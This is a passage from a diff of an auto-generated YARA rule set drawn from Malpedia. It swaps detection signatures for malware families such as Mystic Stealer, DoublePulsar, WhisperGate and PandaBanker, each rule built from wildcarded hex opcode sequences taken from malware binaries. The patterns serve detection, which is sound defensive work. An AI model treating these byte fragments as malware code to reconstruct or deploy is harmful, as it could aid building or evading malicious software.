e9???????? 81c104000000 57 52 68f987eb16 8b1424 81c404000000 } + $sequence_8 = { 89ee b80a000000 81cf40000000 2d04000000 09c7 81c302000000 01d7 } + $sequence_9 = { 8b12 81c206000000 0fb732 81f128000000 09d1 01d1 31c3 } condition: - 7 of them and filesize <1949696 + 7 of them and filesize <11198464 } -rule MALPEDIA_Win_Wscspl_Auto : FILE +rule MALPEDIA_Win_Lcpdot_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f31d95be-4f0b-51e3-8f5f-15d1afc6eb9e" + id = "a95a9872-7a8a-5e4e-81d9-79280cf44b78" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wscspl" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.wscspl_auto.yar#L1-L117" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lcpdot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lcpdot_auto.yar#L1-L158" license_url = "N/A" - logic_hash = "4a0c5de1937bca874bba721d790f101d8b394ac870591bd7e9ae3e7dc3c9255d" + logic_hash = "3aab7a93128b920a2310606f2af0b9275aa227850391bd4e2d60e74544bd69d0" score = 75 quality = 75 tags = "FILE" @@ -164636,32 +167405,37 @@ rule MALPEDIA_Win_Wscspl_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 740b b855000000 66a3???????? 8b4c2404 51 } - $sequence_1 = { 8bcd 8d742414 8d442418 e8???????? 0fbf442414 50 8d4c241c } - $sequence_2 = { 8d442430 50 68???????? 6a00 6a00 c744244000000000 } - $sequence_3 = { 8b74240c 3bf7 7435 8b3d???????? 8d4900 8b4618 8b4004 } - $sequence_4 = { 8d642400 8b0c18 8d1418 bf05000000 } - $sequence_5 = { 3bc1 763a 03c9 3bc1 } - $sequence_6 = { 663bf8 752f e8???????? 8b0d???????? } - $sequence_7 = { 51 ff15???????? ff15???????? 6888130000 } - $sequence_8 = { 8b1d???????? 55 33c0 56 83c1fb } - $sequence_9 = { 687c230000 8d44240c 6a01 50 ff15???????? 687c230000 68c10b0000 } + $sequence_0 = { e9???????? c705????????01000000 e8???????? 83f801 } + $sequence_1 = { 85c9 0f848c000000 53 56 8b7208 } + $sequence_2 = { 6a01 52 56 8d8508feffff } + $sequence_3 = { e8???????? 85c0 752a 56 ff15???????? } + $sequence_4 = { ff24851e884000 838de8fdffffff 89b588fdffff 89b5bcfdffff } + $sequence_5 = { 90 488b4308 4885c0 743f 488b0d???????? 488d15ad4f0100 } + $sequence_6 = { ffd7 5f 5e c3 55 8bec 81ec400c0000 } + $sequence_7 = { 8d8d14f4ffff 51 ebd8 83c320 53 8bce e8???????? } + $sequence_8 = { 8b11 8b4228 53 ffd0 33c0 8d55e0 } + $sequence_9 = { 85c0 0f8514010000 4c8d2d0a2f0100 41b804010000 } + $sequence_10 = { 488d4c2430 e8???????? b920080000 e8???????? } + $sequence_11 = { 48894c2408 4881ec88000000 488d0df54d0100 ff15???????? } + $sequence_12 = { 488bd9 894110 bf04000000 3daa55aa55 7519 } + $sequence_13 = { 7409 488bcf ff15???????? 33c0 488b9c2470040000 488b8c2440040000 4833cc } + $sequence_14 = { 488d1d23de0000 488d3d24de0000 eb0e 488b03 4885c0 7402 ffd0 } condition: - 7 of them and filesize <901120 + 7 of them and filesize <257024 } -rule MALPEDIA_Win_Mystic_Stealer_Auto : FILE +rule MALPEDIA_Win_Unidentified_031_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "677c1a33-ba88-5fd2-bb60-e482ebad5ee5" + id = "f9c620fb-a7af-59b3-88ea-9e26f2264efe" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mystic_stealer" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mystic_stealer_auto.yar#L1-L113" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_031" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_031_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "7ef3f130d7f708fe480ce6294f73f2aa94b8d0f4c6423ffb91a1e80eb925cec4" + logic_hash = "135d93e7e92e738a5df3c00f6ebb76c4de980af7c891f431b4f3045d05f7757e" score = 75 quality = 75 tags = "FILE" @@ -164675,32 +167449,32 @@ rule MALPEDIA_Win_Mystic_Stealer_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b461c 42 8b4e08 895614 8a4007 88040a 8b5614 } - $sequence_1 = { 0fb7c7 eb0b 8d4203 8986bc160000 } - $sequence_2 = { 6a02 5d 8b4774 3d06010000 } - $sequence_3 = { 0fb7d8 668bc3 66d3e0 660bc6 0fb7c0 } - $sequence_4 = { eb15 8d4503 8987bc160000 8d4304 } - $sequence_5 = { 668b476c 66890451 85f6 741a 8b4f6c } - $sequence_6 = { 668bc2 8d5f14 66d3e0 8b0b 660bc6 } - $sequence_7 = { eb0c 8d5103 0fb7c0 8996bc160000 0fb7c8 } - $sequence_8 = { 8a86b9160000 88040a b110 2a8ebc160000 8b86bc160000 ff4614 } - $sequence_9 = { 02c2 03cb 0fb6c0 8a843800010000 } + $sequence_0 = { 0f84a6010000 3bfd 0f849e010000 50 e8???????? 6a00 6a01 } + $sequence_1 = { 891f 8dbe9c000000 8b07 3bc3 7411 50 53 } + $sequence_2 = { ffd6 8d4dc8 ffd6 8d4db0 ffd6 8d4d9c ffd6 } + $sequence_3 = { c78504fdffff08800000 c7853cfeffff15000000 c78534feffff02000000 ff15???????? c785ecfcffff3c624000 c785e4fcffff08800000 c785fcfdffff18000000 } + $sequence_4 = { e8???????? 8945a0 8d7cbdd0 ff37 50 8bce e8???????? } + $sequence_5 = { 895508 0f8203ffffff 83c8ff 5f 5e 5b 5d } + $sequence_6 = { 51 52 e8???????? 8d9564ffffff 8d4dc8 89856cffffff } + $sequence_7 = { 57 50 e8???????? 3bc3 740e 895e7c 3dc3040000 } + $sequence_8 = { 8b3f eb03 8b7de0 c7467c01000000 8b4668 ff75e8 57 } + $sequence_9 = { 68???????? 85c0 0f9fc3 f7db ff15???????? 0fbfc0 8b55cc } condition: - 7 of them and filesize <512000 + 7 of them and filesize <1998848 } -rule MALPEDIA_Win_Remy_Auto : FILE +rule MALPEDIA_Win_Whispergate_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7ce97943-cfc3-5429-92c7-f07c9ff48391" + id = "6714083d-3e17-55d3-a1f8-8bf9ddb1ef17" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.remy" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.remy_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.whispergate" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.whispergate_auto.yar#L1-L119" license_url = "N/A" - logic_hash = "8cc4f887faa36fa3ebf369fe88c2b140d588410f99b73c322f37daf8b5d5619a" + logic_hash = "32397ef108fba7d133f035121fc33f6fa3fbeba74a5870442ebf4d00a19bf608" score = 75 quality = 75 tags = "FILE" @@ -164714,32 +167488,32 @@ rule MALPEDIA_Win_Remy_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83c404 3bc3 7420 50 8bc6 8d7c241c } - $sequence_1 = { 56 81c30f010000 53 e8???????? 8d46f0 } - $sequence_2 = { 3dc8000000 0f85c50b0000 6a28 8d742424 895c2424 895c2428 895c242c } - $sequence_3 = { 5d c3 8b7dfc 8d4fff 81f9ffff0000 7728 } - $sequence_4 = { 7451 8d4634 898638100000 8d8634100000 c70000100000 895d0c 895d08 } - $sequence_5 = { 51 8d570c 52 e8???????? 83c40c 8b4508 83c010 } - $sequence_6 = { 8b5604 2bc8 2bd0 c1f902 c1fa02 3bd1 } - $sequence_7 = { 8d8748100000 57 8908 8d4da4 51 8d55a0 52 } - $sequence_8 = { 8d4d90 e8???????? 83c41c c645fc02 895e40 8bff 8b4d94 } - $sequence_9 = { 50 ff15???????? 8b95b4feffff 52 ff15???????? 8b4df4 64890d00000000 } + $sequence_0 = { 89d0 80f92f 0f846b060000 80f95c 0f8462060000 8d50ff } + $sequence_1 = { 0f8409010000 83fb2f 0f8400010000 83fb5c } + $sequence_2 = { f6044840 0f8448ffffff 397dcc 7275 8b45d0 85c0 756e } + $sequence_3 = { 53 31c0 0fa2 85c0 0f84db000000 } + $sequence_4 = { 85ed 75d3 8b542420 8b742424 } + $sequence_5 = { 55 57 56 53 81ec2c010000 8b842440010000 85c0 } + $sequence_6 = { 75e8 890424 e8???????? 89c7 8b44241c } + $sequence_7 = { 56 53 83ec10 8b742420 813e???????? 740e } + $sequence_8 = { e9???????? 837dd427 0f84e4000000 83c001 } + $sequence_9 = { 83c001 85c9 751e 83fa2a 7444 83fa3f 743f } condition: - 7 of them and filesize <507904 + 7 of them and filesize <114688 } -rule MALPEDIA_Win_Prometei_Auto : FILE +rule MALPEDIA_Win_Clambling_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f30d42cb-2af1-5154-8e15-89c897952439" + id = "55c68f1e-9478-508c-963a-a6b0515c5aac" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.prometei" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.prometei_auto.yar#L1-L159" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.clambling" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.clambling_auto.yar#L1-L115" license_url = "N/A" - logic_hash = "5377a5e6947b9cd903f94c70f6185011aeea6f018af2aa2974c11199d44376b8" + logic_hash = "bda71815f9f64d048a93fa253b5199d20d6e6d47cb677b3884b8c43571e95a8e" score = 75 quality = 75 tags = "FILE" @@ -164753,38 +167527,32 @@ rule MALPEDIA_Win_Prometei_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 011d???????? 03c8 8b5de4 a1???????? } - $sequence_1 = { 8bf0 83feff 7425 6a00 8d45d8 50 } - $sequence_2 = { 014364 8b45e4 014368 5b } - $sequence_3 = { bb8c132400 4a af e8???????? 1401 d000 } - $sequence_4 = { 014358 8b45f0 01435c 8b45fc } - $sequence_5 = { 014368 81434400020000 c7434000000000 83534800 } - $sequence_6 = { 8ac2 0245f0 3001 85d2 } - $sequence_7 = { 014360 8b45f4 014364 8b45e4 } - $sequence_8 = { 8b55f0 33c9 8b75fc 8b45f8 85c0 } - $sequence_9 = { 01c8 93 9e b2e0 e605 78a1 a4 } - $sequence_10 = { 013d???????? 8b04b5c8054400 0500080000 3bc8 } - $sequence_11 = { 01435c 8b45fc 014360 8b45f4 } - $sequence_12 = { 014354 8b45e8 014358 8b45f0 } - $sequence_13 = { b901000000 89500c 8bc1 f745c000020000 } - $sequence_14 = { 8b3d???????? b801000000 33c9 53 0fa2 5b } - $sequence_15 = { 8bc1 2bc7 2bd7 0145fc 81c232240000 8bc1 8955e8 } + $sequence_0 = { 6689bc24b0000000 ff15???????? 3bc7 7508 } + $sequence_1 = { 488bd9 498d53e8 418d4802 498943f0 ff15???????? } + $sequence_2 = { 751b e9???????? bb46270000 eb0f ff15???????? 8bd8 eb05 } + $sequence_3 = { 3bc3 751f 8b4c2428 488d942490020000 ff15???????? } + $sequence_4 = { eb0f ff15???????? 8bd8 eb05 bbc7040000 } + $sequence_5 = { 7507 66893d???????? 488b0d???????? 488d542430 ff15???????? 448b442430 } + $sequence_6 = { 7408 488bcb e8???????? 488b5c2458 } + $sequence_7 = { 4c8d442430 33d2 c744243001000000 c744243c02000000 ff15???????? 85c0 } + $sequence_8 = { b8b4050000 eb13 488b03 488bd7 488bcb } + $sequence_9 = { 41b805000000 48894c2420 33c9 8bd5 } condition: - 7 of them and filesize <51014656 + 7 of them and filesize <412672 } -rule MALPEDIA_Win_Sparrow_Door_Auto : FILE +rule MALPEDIA_Win_Slub_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "0be52ebd-81b0-5548-b0c4-71d664335291" + id = "195b7942-1783-5df2-bcee-76020ab94f8f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sparrow_door" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sparrow_door_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.slub" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.slub_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "a3ea16377775f10fb390048ca81fb5b622cc57fa7d5b14e32fa13a939a085057" + logic_hash = "654a15994e2d79fd54a129ac2f9c4ef4cc1a02067acc10e29921ff8e80b39dab" score = 75 quality = 75 tags = "FILE" @@ -164798,32 +167566,32 @@ rule MALPEDIA_Win_Sparrow_Door_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 395c240c 7551 8b5604 8b3d???????? 52 68???????? } - $sequence_1 = { 57 56 ff15???????? 85c0 0f8491010000 8b44243c 3bc5 } - $sequence_2 = { 8d8c2440040000 51 55 8d94243c010000 52 6a00 68e9fd0000 } - $sequence_3 = { 53 50 8bf1 895c2430 895c2438 889c244c060000 } - $sequence_4 = { 8d44245c 50 e8???????? 83c420 85c0 } - $sequence_5 = { a1???????? a3???????? a1???????? c705????????05772a00 8935???????? } - $sequence_6 = { e8???????? 8d542470 52 8d442448 50 8b84249c010000 } - $sequence_7 = { 50 895c2438 c744244844000000 898c2480000000 c744247401010000 6689542478 889c2490000000 } - $sequence_8 = { 894c2418 8954241c 3bc3 7555 } - $sequence_9 = { 8d8c2400010000 51 56 52 ffd5 85c0 74a8 } + $sequence_0 = { ff742420 55 e8???????? 83c414 89442414 85c0 0f8512010000 } + $sequence_1 = { 807c241200 7407 c686e808000000 80beb406000000 740f ffb6b0060000 ff15???????? } + $sequence_2 = { c785bcf8ffffcce48f00 8bc8 c785c0f8ffffa0358400 c785c4f8ffff90e98500 e8???????? 8d95bcf8ffff c785bcf8ffffd8e48f00 } + $sequence_3 = { 85ff 750e 837d2c10 8d4518 0f43c2 3a08 7c13 } + $sequence_4 = { 85c0 0f8443ffffff 8b96f4000000 85d2 0f8435ffffff 8b8df0000000 6690 } + $sequence_5 = { 6800000100 6a00 6801000100 56 ff15???????? 89442414 85c0 } + $sequence_6 = { 898640010000 85c0 0f8416050000 57 e8???????? 83c404 85c0 } + $sequence_7 = { e8???????? 50 68???????? ffb50cfdffff e8???????? ffb50cfdffff } + $sequence_8 = { 8d8dc8ebffff 50 ffb5c8ebffff e8???????? 8b85c4ebffff c785dcebffff0f000000 c785d8ebffff00000000 } + $sequence_9 = { 8b86dc050000 89863c040000 8b86e0050000 898694040000 8b86e4050000 898640040000 8b86e8050000 } condition: - 7 of them and filesize <155648 + 7 of them and filesize <1785856 } -rule MALPEDIA_Win_Spaceship_Auto : FILE +rule MALPEDIA_Win_Onionduke_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "b89dfb6c-e6cf-5987-bb83-c34e2134133d" + id = "bc18bebb-924f-5db1-bda1-575db25c40f5" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spaceship" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.spaceship_auto.yar#L1-L119" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.onionduke" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.onionduke_auto.yar#L1-L117" license_url = "N/A" - logic_hash = "411bed797a77bb254c4227872033ffc1c4978f634b16d7697bf043a78e35e5f7" + logic_hash = "2b5a6150c91e41c1ea04d8a66d543531da34a08cde94cd3e5e729e90a4473cac" score = 75 quality = 75 tags = "FILE" @@ -164836,33 +167604,33 @@ rule MALPEDIA_Win_Spaceship_Auto : FILE malpedia_license = "CC BY-SA 4.0" malpedia_sharing = "TLP:WHITE" - strings: - $sequence_0 = { 6689842464030000 6689842466030000 c784246803000028694100 66899c246c030000 668984246e030000 c784247003000018694100 } - $sequence_1 = { 66c78424a40400001200 66898424a6040000 c78424a804000070674100 66c78424ac0400001300 66898424ae040000 c78424b004000064674100 } - $sequence_2 = { 0f8415010000 bb01000000 3bfb 0f8cff000000 eb04 } - $sequence_3 = { 84c0 7547 eb31 8d7502 40 8a10 8aca } - $sequence_4 = { 52 e8???????? 83c418 5f 5e 5b 83c410 } - $sequence_5 = { 85c0 7454 8a442404 84c0 } - $sequence_6 = { 53 ff542428 8d8c2454020000 51 e8???????? } - $sequence_7 = { 8b442424 8b0d???????? 56 50 } - $sequence_8 = { 8d3c8d00ec4100 c1e603 8b0f 833c31ff } - $sequence_9 = { 723c 8d8c2458030000 6a00 8d94245c050000 51 52 ff15???????? } - + strings: + $sequence_0 = { 33d2 895e68 66895658 8b550c 8d4202 c645fc04 8945ec } + $sequence_1 = { c1e81f 03c2 897dcc 0f84d0000000 897dd0 eb02 } + $sequence_2 = { 384b01 7506 40 380c18 } + $sequence_3 = { 894ee4 894ffc 8d4eec 8d57ec 8d5fec } + $sequence_4 = { 56 8bf1 837e0c00 751e 6a04 e8???????? 83c404 } + $sequence_5 = { 3bfb 72ac 5f 5e } + $sequence_6 = { 8b4e44 8b09 85d2 7405 } + $sequence_7 = { 8910 894ed0 8b56e0 8957e0 8b56e4 } + $sequence_8 = { e8???????? 83c404 33c0 eb66 8bc6 8d5001 } + $sequence_9 = { 80f90f 7f05 80c157 eb02 32c9 } + condition: - 7 of them and filesize <262144 + 7 of them and filesize <671744 } -rule MALPEDIA_Win_Lightlesscan_Auto : FILE +rule MALPEDIA_Win_Ldr4_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "0e07ce78-7b41-59eb-abf5-c61709c5b1e0" + id = "ccab43fe-6663-5ab0-9f9d-f8403f8cf5d7" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightlesscan" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lightlesscan_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ldr4" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ldr4_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "75c6d82588f11dc73e097a77d8f1194031d887782bbdd3a0785b555591ab1fe4" + logic_hash = "78a7719e8cf0704f5c76c874cc1f41ecbae742c2d4a4b3ef70df1b0258c1fe71" score = 75 quality = 75 tags = "FILE" @@ -164876,32 +167644,32 @@ rule MALPEDIA_Win_Lightlesscan_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 33db 48895c2460 488b4d70 4885c9 7405 e8???????? } - $sequence_1 = { b890100000 e8???????? 482be0 48c7442458feffffff 48899c24c8100000 4889b424d0100000 4889bc24d8100000 } - $sequence_2 = { 4863d8 e8???????? 488bd3 b940000000 ffd0 488d0deaa20300 c705????????01000000 } - $sequence_3 = { 488d0d50c00100 e8???????? 4983c8ff ba80000000 488905???????? 488d0da05d0500 4885c0 } - $sequence_4 = { 4881c440020000 5b f3c3 8815???????? 0100 a9150100c7 150100d615 } - $sequence_5 = { 498bcc e8???????? 488d1564b70500 41b804000000 498bcc e8???????? 488d1567b70500 } - $sequence_6 = { 4889442420 e8???????? eb0c 4c8d0d68440100 e8???????? 488d0d8cc10100 } - $sequence_7 = { 488d0d23b40600 ffd0 48833d????????00 7415 488d0db04a0300 e8???????? 488b0d???????? } - $sequence_8 = { 7506 ff15???????? 4489bc24f8000000 488b07 418bf7 0fb74814 } - $sequence_9 = { 488d4d30 33d2 41b801100000 e8???????? 33d2 41b8faff0000 488bce } + $sequence_0 = { ff750c 0fb745f0 ff7508 50 0fb745ee 50 0fb745ec } + $sequence_1 = { c9 c20c00 56 6a2f ff74240c e8???????? 6a3f } + $sequence_2 = { 6a00 53 ff15???????? 837df800 0f8528010000 8d45f4 } + $sequence_3 = { 53 56 57 8945f8 33c0 33db 6a3e } + $sequence_4 = { 7506 6683f901 7723 83c720 66893b eb04 8365fc00 } + $sequence_5 = { 8d442410 50 8b442420 358555f261 50 8bc3 e8???????? } + $sequence_6 = { ff15???????? 8bf0 85f6 742c 33c9 85db 7622 } + $sequence_7 = { 8d8d00feffff 51 e8???????? 85c0 757e } + $sequence_8 = { 8d42f8 d1e8 3955fc 7c3e 85c0 } + $sequence_9 = { 0f84f1010000 8b3d???????? 50 ffd7 ff750c 8945e8 ffd7 } condition: - 7 of them and filesize <1399808 + 7 of them and filesize <117760 } -rule MALPEDIA_Win_Doublepulsar_Auto : FILE +rule MALPEDIA_Win_Spyder_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e4212e3d-0371-55d3-984d-e0909a78bc0f" + id = "3ab12f00-3358-5020-939c-e2c585a1665c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublepulsar" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.doublepulsar_auto.yar#L1-L175" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spyder" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.spyder_auto.yar#L1-L176" license_url = "N/A" - logic_hash = "dd8758cb2c036e196362248313c65a128ef51c3148638e90157034cf0392e7be" + logic_hash = "bab678e49456b3f7ffea3f1f145c31d0ca13e5400d7a321bcd98016f59a4377c" score = 75 quality = 75 tags = "FILE" @@ -164915,38 +167683,38 @@ rule MALPEDIA_Win_Doublepulsar_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 731b 8a44144d 8d7c244c 8844144c } - $sequence_1 = { 8d41ff 85c0 7c10 8a1430 80fa5c 7408 } - $sequence_2 = { 8bc1 8bf7 8bfa 89ac245c020000 c1e902 f3a5 8b542410 } - $sequence_3 = { 0f8423010000 8b13 68???????? 52 ffd6 83c408 85c0 } - $sequence_4 = { e8???????? 48 8b4520 48 8b4878 48 } - $sequence_5 = { 5b 81c4c8040000 c20800 a0???????? } - $sequence_6 = { 8bc3 5f 5e 5b c3 b8???????? 83f901 } - $sequence_7 = { 83c410 85c0 740a 68???????? e9???????? 8b442408 53 } - $sequence_8 = { 53 33c0 56 8b742420 } - $sequence_9 = { 83c151 57 51 ff5618 85c0 7404 31c0 } - $sequence_10 = { ffd6 83c408 85c0 0f84990e0000 8b03 68???????? } - $sequence_11 = { 7414 8b5640 8b4c2414 52 51 } - $sequence_12 = { 55 e8???????? 8bd8 85db 0f84a0000000 56 } - $sequence_13 = { 33c0 bade47773f 8d4848 f3aa } - $sequence_14 = { c1ea18 33c3 8b1c95f0354000 8b56fc 33c3 8b1c8df0414000 } - $sequence_15 = { 52 ff15???????? 8b4518 83c404 85c0 7517 a1???????? } + $sequence_0 = { 4053 4883ec20 8bd9 488d0da5a40000 ff15???????? 4885c0 7419 } + $sequence_1 = { 0f8493010000 488d156a5f0000 488bc8 ff15???????? 4885c0 0f847a010000 } + $sequence_2 = { 756e 488d4b04 4c8d05563e0000 418d5216 e8???????? 85c0 7437 } + $sequence_3 = { eb17 488b5638 498bcc ff5630 b97f000000 ff15???????? } + $sequence_4 = { 7422 488d15795e0000 488bce ff15???????? 488bc8 } + $sequence_5 = { 496374243c 4903f4 813e50450000 740b b9c1000000 } + $sequence_6 = { 7647 498bcd e8???????? 4c8d05478a0000 41b903000000 488d4c45bc 488bc1 } + $sequence_7 = { 85c0 7408 8bcb ff15???????? e8???????? 488d15faa20000 } + $sequence_8 = { 8b7d0c 8d0540460910 83780800 754e b741 b35a } + $sequence_9 = { 50 a3???????? e8???????? 8db6843d0910 bf???????? } + $sequence_10 = { 888800490910 eb1f 83f861 7213 83f87a 770e 8088????????20 } + $sequence_11 = { 83c424 aa 8d842484000000 6804010000 50 53 } + $sequence_12 = { 81e1ffff0000 50 51 68???????? 8d54243c } + $sequence_13 = { 68???????? 8d44242c 8d8c2494050000 50 68???????? } + $sequence_14 = { b801000000 5b 81c47c150000 c3 5f 5e 33c0 } + $sequence_15 = { 0fb6d2 f682014a091004 7403 40 } condition: - 7 of them and filesize <140288 + 7 of them and filesize <1458176 } -rule MALPEDIA_Win_Breakthrough_Loader_Auto : FILE +rule MALPEDIA_Win_Jolob_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "c04a79be-d1c6-5097-81f4-9cd0a78c5ca6" + id = "a7a30cc7-8517-58f2-b42f-ed67321f20be" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.breakthrough_loader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.breakthrough_loader_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jolob" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.jolob_auto.yar#L1-L126" license_url = "N/A" - logic_hash = "6b4d6b03c6e2480f390e69c1bdad99aa25aa8d566c5f76108e42a507f3962675" + logic_hash = "7066e8000a5c7d67ee5c483efa94c88c66463d1307008135462062b7827f4ff2" score = 75 quality = 75 tags = "FILE" @@ -164960,32 +167728,32 @@ rule MALPEDIA_Win_Breakthrough_Loader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7e2a 8b7df8 660f1f840000000000 0fb7444e08 a900300000 740a } - $sequence_1 = { 5d c3 8b4d14 890e 8b4d24 } - $sequence_2 = { 8945e8 8945f8 8b4508 56 be???????? c745eca07d4400 57 } - $sequence_3 = { 8b450c 0fb68401d86a4400 c1e804 5d } - $sequence_4 = { 85f6 742d 83f910 8d442420 0f43442420 881418 } - $sequence_5 = { e8???????? 33c0 c744242c07000000 8d8c2490000000 } - $sequence_6 = { 8bc7 83e03f 6bc830 8b049540354500 f644082801 7421 57 } - $sequence_7 = { 83e03f 6bc030 59 59 0304bd40354500 5f eb05 } - $sequence_8 = { 8b0cbd40354500 83c410 8b7de8 89440f20 8bc6 } - $sequence_9 = { 8b3e 8d0417 3bd0 731d 8d47ff 8906 8b4b20 } + $sequence_0 = { 8bf7 668954242a 668974242e 6683fa0d 750c 66ff442428 } + $sequence_1 = { 57 ff7318 e8???????? eb2d 8b7c2428 83c70c 57 } + $sequence_2 = { ff15???????? eb2e 8b7e1c e8???????? } + $sequence_3 = { 8d45e4 6a10 48 c745f401000000 5b 8945f0 8365f800 } + $sequence_4 = { 8d45f0 50 ffb714080000 e8???????? 85c0 75df 40 } + $sequence_5 = { 8b442404 85c0 7501 40 50 6842200000 ff15???????? } + $sequence_6 = { 8b17 895648 83671000 894714 895f18 890f 8b5104 } + $sequence_7 = { 6683fa0b 741a 6683fa02 7532 } + $sequence_8 = { 77f5 8bc7 5e c3 33c0 5e c3 } + $sequence_9 = { 83ec28 8365f400 53 56 8bf0 8d461c } condition: - 7 of them and filesize <753664 + 7 of them and filesize <196608 } -rule MALPEDIA_Win_Putabmow_Auto : FILE +rule MALPEDIA_Win_Pandabanker_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "118d99b8-b7d8-55d9-89f4-cf8d56f456ff" + id = "58cad36d-92dc-5f57-8115-b38a95b1c2cd" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.putabmow" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.putabmow_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pandabanker" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pandabanker_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "4091b5988ccb2a8139f14760c8b7e9d61862064b8efc99f4d36fbebf2dc41c73" + logic_hash = "64182a4cfed301300c0a7df71a34e50b114a69353e8eb5e84fdb9f4804c83f2c" score = 75 quality = 75 tags = "FILE" @@ -164999,34 +167767,34 @@ rule MALPEDIA_Win_Putabmow_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 016306 07 015100 07 015600 0801 51 } - $sequence_1 = { e8???????? 8b55f0 8b4a0c 894d08 894dec 8d4118 89420c } - $sequence_2 